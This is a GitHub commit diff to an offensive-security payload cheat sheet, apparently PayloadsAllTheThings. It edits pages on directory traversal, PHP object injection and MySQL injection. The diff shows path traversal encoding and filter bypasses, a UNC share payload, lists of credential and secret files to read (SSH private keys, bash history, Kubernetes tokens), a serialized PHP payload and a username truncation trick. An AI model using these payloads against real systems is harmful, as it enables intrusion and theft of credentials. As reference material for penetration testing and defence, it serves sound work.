Skip to content

Commit

Permalink
Fix typo in PHP Object injection
Browse files Browse the repository at this point in the history
  • Loading branch information
swisskyrepo committed Jul 5, 2019
1 parent 13ba72f commit f656486
Show file tree
Hide file tree
Showing 3 changed files with 36 additions and 15 deletions.
43 changes: 29 additions & 14 deletions Directory Traversal/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,14 @@

* [Tools](#tools)
* [Basic exploitation](#basic-exploitation)
* [16 bits Unicode encoding](#)
* [UTF-8 Unicode encoding](#)
* [Bypass "../" replaced by ""](#)
* [Double URL encoding](#)
* [UNC Bypass](#unc-bypass)
* [Path Traversal](#path-traversal)
* [Interesting Linux files](#)
* [Interesting Windows files](#)

## Tools

Expand All @@ -31,41 +38,50 @@ We can use the `..` characters to access the parent directory, the following str
%uff0e%uff0e%u2216
```

16 bit Unicode encoding
### 16 bits Unicode encoding

```powershell
. = %u002e
/ = %u2215
\ = %u2216
```

UTF-8 Unicode encoding
### UTF-8 Unicode encoding

```powershell
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
```

### Bypass "../" replaced by ""
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.

```powershell
..././
...\.\
```

Double URL encoding
### Double URL encoding

```powershell
. = %252e
/ = %252f
\ = %255c
```

### UNC Bypass

An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.

```powershell
\\localhost\c$\windows\win.ini
```


## Path Traversal

Linux - Interesting files to check out :
### Interesting Linux files

```powershell
/etc/issue
Expand All @@ -85,9 +101,16 @@ Linux - Interesting files to check out :
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
```

Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
### Interesting Windows files

Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)

```powershell
c:/boot.ini
Expand Down Expand Up @@ -127,15 +150,7 @@ The following log files are controllable and can be included with an evil payloa
/var/log/mail
```

Other easy win files.

```powershell
/proc/self/cwd/index.php
/home/$USER/.bash_history
/var/run/secrets/kubernetes.io/serviceaccount
```


## References

* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
2 changes: 1 addition & 1 deletion Insecure Deserialization/PHP.md
Original file line number Diff line number Diff line change
Expand Up @@ -99,7 +99,7 @@ if($obj) {
Payload:

```php
O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
```

## Others exploits
Expand Down
6 changes: 6 additions & 0 deletions SQL Injection/MySQL Injection.md
Original file line number Diff line number Diff line change
Expand Up @@ -263,6 +263,12 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo

In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.

```sql
`username` varchar(20) not null
```

Payload: `username = "admin a"`

## MYSQL UDF command execution

First you need to check if the UDF are installed on the server.
Expand Down

0 comments on commit f656486

Please sign in to comment.